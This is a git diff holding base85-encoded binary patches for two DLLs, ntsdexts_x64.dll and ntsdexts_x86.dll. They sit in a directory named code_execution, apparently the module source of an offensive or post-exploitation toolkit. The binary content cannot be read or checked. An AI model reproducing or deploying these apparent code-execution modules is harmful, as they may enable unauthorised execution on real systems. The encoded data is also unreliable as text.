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 literal 0 HcmV?d00001 diff --git a/data/module_source/code_execution/ntsdexts.dll b/data/module_source/code_execution/ntsdexts_x64.dll similarity index 100% rename from data/module_source/code_execution/ntsdexts.dll rename to data/module_source/code_execution/ntsdexts_x64.dll diff --git a/data/module_source/code_execution/ntsdexts_x86.dll b/data/module_source/code_execution/ntsdexts_x86.dll new file mode 100644 index 0000000000000000000000000000000000000000..b54891dbc7b273f087e79472fa5354f357216908 GIT binary patch literal 81864 zcmeEveLz&_mG?yk8F6&R2$3|HT$7<8@gpRo2?!=23~B;6FbGcl3c}z85y;HFh^eO7 zVOqxPY}2jT*L0KJxVGDLo90*P72f#ier`XTzVWa@=9u=~u?CH@=Lac;@Xt zn9037?I-gNr&a%CUW3pc=6gcjTSCp-_?G6bu5OXv9OOe%7vJ8+SFZN++qzqWi)PHo za_gWk&z-3Jr=5R3$M~zAe)pW0k*=M7@0?dz{#WLlVCngDzR&K9=6s3W@0s%*cCVjv z2=}LdFsi5X^?L!k*SEI_1lyp*=jFKSv<&XtH(fp>?;oo9DPf$B*!0y^@=+_(?oZ$%12?qIGs>=W&#g`!qp>u=W$>?48Ci?OV4sNlE&qZG;YGC4pj&=C z$33>FwOMRN-rc}~(Vm6-JNUEw$~bOlQM*?0pQcd(I;MK>(R1=w1{4>C!l4#qFDk`XW4CjtZ|5>`=W3ySf?eIx7J(1cviPR|^!Cue-eqqyQAXyJy1&-T;FJ?O`#r11h<#JG8Bt21LWXRb)7@&P9Q-%0%9RgH{BbgP~A& zh-V#{^^6D9XZ+$VmC(z)EzM&0Hlxy{yWWQ=1o^{LUUJZXOLf~ z-9eG%r?=IsOePI&F-H8lmTj%6%@_oIz=3dqw%Quz*DdVbux?@ZB$zrb&7GZmg)!2Q31W1Z7DCG)YWQA58^5lt zvv~{Pi#vLP8!&h`B2VYSsy4o>o7Wi-?g_TEx3vdb7x09JmK)}qLqWb3G8k;d6x7>Q zv7V@8b325&y{i?XDYkcQ;kQ5pXexIGdxOM)Hk}t}i_U1640eb4LSop$`>yRSOm+bJ z=GC7{@}Le9-%u#*u?RyLx>}*` z!V;zp6pk^G^>H%b6+(DSc#~?A&>2v>dxBktBpdv*;#J7ECE-A1Lpv~=A;#N-WQ+1` zkZitrbGIY{B~5TOIw!+m{L(w1GV9O8^M>#lrl^4x0&upFw1Q@gb+fK5p=8K5CI!<) z9P8p+lNt!F!>TD| zA{+L1cNhNHgk?~)`2x;h#t>}_AI5Ys`)}6OUmL-|VnoP;ZJR^E-gdTDu*HYkbxGSc zLpvM+twS~o-aZ-Y>fG;{^G>-dC4h+iwH5xap2!7zVTlJv6qW(S5gBP9${ zLfA$a>I!SR#vpzY1P%Ut4RauwgaHu)@mNR*=^M1ika2|H!cT}tOJ@)|3;KN$CJe?W zz~kfE8@83c`e2-Eq33BmGj$3ZS4}oxsr2~8=9aAuA=o^XFz1(Jo)azfTj?$LdDk{9 z<=1qP%n124#z?q&e{OnpyP@(YXlmcpQG^bSskIj>WLq zFr5swKmys!gL2G80H-=qS7&!~Yq0g zVZ7)WtG9Py{xmQH5yg{nZ|%msC+*fl=Cdvs-Aog-5;uTQTera?D?QtSnATV&2u+AL z_6|@U*AOXyfXzW@%urCG4aW9%Q6QZTbGnnXePyr{`;SQ@QgAm9V)3ITlkQ#;Or4&J zZdm!)pcn*_RwY5YE^k)0ZxK+I)d1X#G0P9n&+qKhht9;W-n(#BEyS$6devvVl~`)1 z$u;CKCSg3gfw(RzI-vHhut>WV%t@L(=rdUZhP&DO$4ZPZ1RHuYEQ#9H4Oof6cP#YK z=}&-blkw12!vCa?8;tB^c!cjK?bg&dtHQ)l+8F6mmZUJ)3Q!meZF*Q)O?{YhN=iWc zQMc8rD<1V$qCy}T#y*hanwr~T$u@Owh2ZEvwgtRS`}|JKwp5vCEm*!)_6<0z9$4H* zxFluD=z@n>V2-8A7ZtMnd+xc1*C@=g=pB7$(XMZ(yL(75wN?18h50RaWr61Itt9Cr z1l^$?m@?NHP^{9LzQKAhnXA~|5KphK>%!fgy;!rEuDpI*Hnygo^kLP5!OkCV z`N)TNY}?%3sqIm9omaie->}JB+fW}!>DM4~Q?eXu^AkZnpA;VCm-f2EqHy&m#`y+{ zni;BDTov@hR$>5t*XIFdovw^9x&AX&aLX<5vixFq54KmDl}@7sOQ;!&il#C4eOPn1 zF@;V=lP3+fSB8Eh9^VjF3xq1v-MO$L3-wyq77JXv1|*F_J_NLLEyuy95Dw4V1UJH_ zhL!c+^2!_0Z>h$YX$q)5*oKWvS4+^)o1N`Yo2yzEt?6oiTnd^CLPcu6K8)sg65F8* z*{X_VyJrEf*PullDWf?}l12Diz%zwR$pt)c;92+D6ykhIY6wjLU}gcMHPkz=A{?sk z?iNiHK7PC{)rj{bZ`Hb(Sor3vUtQt#`>!uIWJq0GcaZ^#zve;17cP7?xUQkDGkf*|`e-E^rlkNSemSYja^&echJ?M$mC}ciH^3$8LFf?v_;wmv7{B1Idi~M+T!X? z$1H8*ge4YUD7GKvIcyFvfv_868!gi(hU|Q%*Nt)*7~SxU1P$Fl`Zr%F$H39{ zocUxRbZ-lrU}^1Y?kp#ud>ecN%qNpC^zpPVU_@aGY1zz_2LJe;cJicfs8f)Cf9u`+ zG7M-KrLA|fwQS+T9Ji)xYghMn>?z5qa94g9%LVcbQ=iQ_!)KG?{aX{pPL6pyLsE~p zXwf1d4L3~J78nLlD=V4j4OB9hgSou%)7V@@ANdRKTe3Yojp=RF*ZN>S0ftHbcC^jP znx_q$$d+N#PznX%duxHt+`NOIrU1TMq{xn_8D>DRz@b6b(_!ZUA>!t+3ODbFJ>A9@8hqSL?|!lSug zCXv8lFT(Wu0zUsvvXe{er7p6DAHuUH-w>Kb80&)k@ZH#tfHkT4y5l)HCfZ1AWLw;p z=zxT;LAO|F7WXYBOsl)Mbax?%!PheUSaY%KLK?lz6R;d_wa`?RRm1U%BH`bVPugarYP-euHsrEBLr~LhTE8Mg ztfspa<=DsqFN0qV!4Q0!8s1tvO@at^W6f&X!s5 zwE!qRT@&n*;GcnQZ^*|ZnAly-o!E+WGaU4^4+j64}pvX9fJN9526WLghGZW>yv}w(>`XpWYF_J#lQgXDt7ph_p zww3L@>#;*`#t=4jhqeYo1bqkR7bFo3Bo)p1y0!hua`2SW`kD{iv{7I}NmCeWCP+fQ zK?TzYlZ#PKTZkIwU9dDmeob==JjB8BmKJh#q?R?bY_??hgJ6dQ1-B!a=?^x5BBtcR zLVHiL060^h&8?L{G8nQJ0L~6<>$icAZ9v~zgf@Dv9}5bVu|Y{z@dsCRL7bYyLGtJ! zzk4!18h?Bk=*hqh-of936D*8n5-j>9_m7l9fInCtWZv48dd4UvGyOs4lt^YU+RLTZ zc54sB4~=ebS8sc$yNfKeNo^{y_HGGkdNf%?cx>wygV**AJ=W%W~4h&+QL=i+6C){ zel?tgn$1XS?VDIxE9!1XJ1R-`NjPjnP7iD$f=yUHiYxWuL%JKVgIpN@5gzok6|K8b zA2j1$fxm4?5#C9t&{cp(7!cjGm^T22ZFnXH`Uu)=#=QwO+8I8ZS^HF)gQz2MTe#J@ zcc3LvZ{QY$#b)Is!S4Y)qJS*85O~>~!mo00$Oo)=Tn)||{a=p;A8SvrG#=LCKmpxz z?92yu-SNa#VRBMFTQG6g)<3u>sSfjRw6_?0m>LO(ZvdxhbXwyzSuqdX(1uI~V=*;W zc|%jL>aOUfgEqYxM>B!2YCy;Y<7@Y3=D#8<-o%G&UTr}k*uhqvfQBATt5!9)z^%K3 